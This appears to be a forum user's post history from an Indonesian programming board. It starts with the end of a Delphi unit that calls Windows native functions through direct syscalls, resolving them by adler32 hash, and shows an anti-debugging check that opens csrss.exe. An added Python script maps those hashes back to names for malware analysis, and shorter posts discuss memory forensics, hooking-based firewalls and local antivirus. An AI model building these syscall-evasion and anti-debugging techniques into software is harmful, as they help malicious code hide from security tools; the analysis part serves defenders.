function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4, arg5, Arg6: Pointer): DWORD; stdcall;
asm
  jmp ApiStub;
end;

function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4, Arg5, Arg6, Arg7: Pointer): DWORD; stdcall;
asm
  jmp ApiStub;
end;

function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4, arg5, Arg6, Arg7, Arg8: Pointer): DWORD; stdcall;
asm
  jmp ApiStub;
end;

function ApiCall32(Number : DWORD; Arg: Array of Const): DWORD; stdcall;
begin
  case length(arg) of
    1 : result := ApiCall32(Number, Arg[0].VPointer);
    2 : result := ApiCall32(Number, Arg[0].VPointer, Arg[1].VPointer);
    3 : result := ApiCall32(Number, Arg[0].VPointer, Arg[1].VPointer, Arg[2].VPointer);
    4 : result := ApiCall32(Number, Arg[0].VPointer, Arg[1].VPointer, Arg[2].VPointer, Arg[3].VPointer);
    5 : result := ApiCall32(Number, Arg[0].VPointer, Arg[1].VPointer, Arg[2].VPointer, Arg[3].VPointer, Arg[4].VPointer);
    6 : result := ApiCall32(Number, Arg[0].VPointer, Arg[1].VPointer, Arg[2].VPointer, Arg[3].VPointer, Arg[4].VPointer, Arg[5].VPointer);
    7 : result := ApiCall32(Number, Arg[0].VPointer, Arg[1].VPointer, Arg[2].VPointer, Arg[3].VPointer, Arg[4].VPointer, Arg[5].VPointer, Arg[6].VPointer);
    8 : result := ApiCall32(Number, Arg[0].VPointer, Arg[1].VPointer, Arg[2].VPointer, Arg[3].VPointer, Arg[4].VPointer, Arg[5].VPointer, Arg[6].VPointer, Arg[7].VPointer);
    else result := 0;
  end;
end;

function ApiCall32(ApiName: AnsiString; Arg: Array of Const): DWORD; stdcall;
begin
  result := ApiCall32(GetSysNumber(ApiName), Arg);
end;


initialization
  //$240C0388 is this unit's adler32 (seed 0) of the UTF-16 base name 'ntdll.dll';
  //a private copy of ntdll is mapped from disk only to read the syscall numbers from it
  Ntdll := LazyLoadPe(ExGetmoduleFileName($240C0388));
  InitSysCall;
finalization
  FreeMem(Ntdll);
end.

usage example:
Code:
//NtSuccess lives in the implementation section of U_MemExecute, so the caller needs its own copy
function NtSuccess(Stat: LongInt): Boolean;
begin
  Result := Stat >= 0;
end;

//OBJECT_ATTRIBUTES, CLIENT_ID and InitializeObjectAttributes come from a native API
//header such as JwaNative; CsrGetProcessId is an ntdll export
function CsrGetProcessId: DWORD; stdcall; external 'ntdll.dll';

function ExOpenProcess(dwDesiredAccess: DWord; Id : DWord):THANDLE;
var
  hProcess: THANDLE;
  attr: OBJECT_ATTRIBUTES;
  cli: CLIENT_ID;
begin
  InitializeObjectAttributes(@attr, nil, 0, 0, nil);
  cli.UniqueProcess := THandle(Id);
  cli.UniqueThread := 0;
  result := 0;
  //NtOpenProcess through the direct syscall path
  if NtSuccess(ApiCall32('NtOpenProcess', [@hProcess, dwDesiredAccess, @attr, @cli])) then result := hProcess;
end;

//opening csrss.exe with full access only works with the debug privilege enabled,
//which a debugger session normally grants, so success is taken as a debugger indicator
function Antidebug1:boolean;
var
  h:Thandle;
begin
  result := false;
  h := ExOpenProcess(PROCESS_ALL_ACCESS, CsrGetProcessId);
  if h<>0 then begin
    result := true;
    ApiCall32('NtClose', [h]); //NtClose
  end;
end;

btw link to my blog http://cybercoding.wordpress.com/2012/12/01/union-api/
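Added example (Python, not from the post): the adler32 variant in U_UnionApi reimplemented, with a resolver that maps the unit's hash constants back to module and export names, as an analyst does when a sample resolves APIs by hash instead of by string. The unit passes seed 0, so the standard zlib.adler32 does not reproduce its values; the candidate name lists are constructed for the example.

```python
import zlib
from typing import Callable, Dict, Iterable, Optional

MOD_ADLER = 65521


def unit_adler32(data: bytes, seed: int = 0) -> int:
    """Adler-32 as the unit's asm computes it: a = low word of seed, b = high word.
    The unit always passes seed 0, so 'a' starts at 0 instead of the standard 1;
    seed=1 gives the ordinary zlib value."""
    a = seed & 0xFFFF
    b = (seed >> 16) & 0xFFFF
    for byte in data:
        a = (a + byte) % MOD_ADLER
        b = (b + a) % MOD_ADLER
    return (b << 16) | a


def matches_zlib(data: bytes) -> bool:
    """Sanity check: with the standard seed the routine equals zlib.adler32."""
    return unit_adler32(data, 1) == zlib.adler32(data)


def module_hash(base_name: str) -> int:
    """Hash used by ExGetmoduleHandle/ExGetmoduleFileName: they hash
    LDR_DATA_TABLE_ENTRY.BaseDllName, a UTF-16LE buffer whose Length is in bytes,
    so the name is hashed in its UTF-16LE encoding (case-sensitive)."""
    return unit_adler32(base_name.encode("utf-16-le"))


def export_hash(api_name: str) -> int:
    """Hash used by GetSysNumber(ApiName): the ANSI export name without terminator."""
    return unit_adler32(api_name.encode("ascii"))


def build_lookup(names: Iterable[str], hasher: Callable[[str], int]) -> Dict[int, str]:
    """Precompute hash -> name for a candidate list (e.g. an export table dumped
    from ntdll.dll, or the module names seen in a process)."""
    return {hasher(n): n for n in names}


def resolve(hash_value: int, table: Dict[int, str]) -> Optional[str]:
    return table.get(hash_value)


# Constructed candidate lists; a real analysis feeds the full export/module tables.
MODULE_NAMES = ["ntdll.dll", "kernel32.dll", "KERNELBASE.dll", "user32.dll"]
API_NAMES = ["NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtOpenProcess",
             "NtGetContextThread", "NtSetContextThread", "NtResumeThread", "NtClose"]

NTDLL_HASH = 0x240C0388  # the constant from the unit's initialization section


def resolve_unit_constant() -> Optional[str]:
    """Which module the unit maps at start-up."""
    return resolve(NTDLL_HASH, build_lookup(MODULE_NAMES, module_hash))


def hashes_the_unit_would_use() -> Dict[str, int]:
    """What ApiCall32('Nt...') hashes internally; useful as constants to look for
    in a sample that embeds this unit."""
    return {name: export_hash(name) for name in API_NAMES}


if __name__ == "__main__":
    print(f"{NTDLL_HASH:#010x} -> {resolve_unit_constant()}")
    for name, h in hashes_the_unit_would_use().items():
        print(f"{h:#010x}  {name}")
```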

5
Programming / Belajar Memory Forensic Dengan Volatility
« on: January 12, 2012, 02:20:50 PM »
wrote a bit on the blog about Volatility (memory forensics), maybe it's useful..

Link: http://cybercoding.wordpress.com/2012/01/12/memory-forensic-volatility/#more-152

6
Programming / Re: Hem.... Butuh Firewall Gan
« on: January 12, 2012, 12:58:39 PM »
the question is whether you are already familiar with the hooking method? if yes,

try filtering by hooking a few functions in winsock.dll (send, recv, gethostname, etc.) or the low-level DeviceIoControl

the above is only usermode; if you want to go into kernelmode, try hooking NDIS (Network Driver Interface Specification)..

an interesting resource for you:
Firewall For Windows http://www.ntkernel.com/w&p.php?id=14


7
Visual Basic / Re: (Share) Mendapatkan Direktory Aktif - Windows Vista & 7
« on: January 10, 2012, 06:27:25 PM »
haha, you're such a kid, bro, getting worked up over that. Who told you to write "not recommended"? Write something nicer, like "if you want to learn more, read the link", but you went straight to "not recommended", lame.
Admin, sorry, please don't delete this before the alley cat himself reads it.

well then, go back to nursing from your mommy ^_^ ^_^ ^_^

Quote
Meong is right; it would be good if local AVs now looked at hooking techniques and learned more advanced techniques so the AVs they build aren't just so-so, especially since viruses in Indonesia are currently dominated by foreign viruses and most of them have rootkit capabilities; local AVs inevitably have to keep up with developments

so someone does get it :D


8
Visual Basic / Re: (Share) Mendapatkan Direktory Aktif - Windows Vista & 7
« on: January 10, 2012, 11:53:28 AM »
True, for advanced techniques the method above is not recommended, but for a local AV it is already more than enough, rather than not being able to build an RTP at all; hehe, you know local AVs still can't use hooking techniques, so a simple substitute will do :P

that's why I gave a link to a sample and a little tutorial, so you can, even if it's only IAT hooking.. little by little you'll surely get there, right?

Yup, because learning has its measure, just like eating: you don't finish a whole pot in one bite.
Better simple and wise than excessive but wasteful.

who told you to eat the whole pot at once?





10
Chit-Chat / Re: SMADΔV, the greatest local AV !!!!!
« on: December 22, 2011, 03:09:38 PM »
what about Ramnit itself? can Smadav disinfect the virus? or should we just use another AV, since Smadav is only for local viruses?
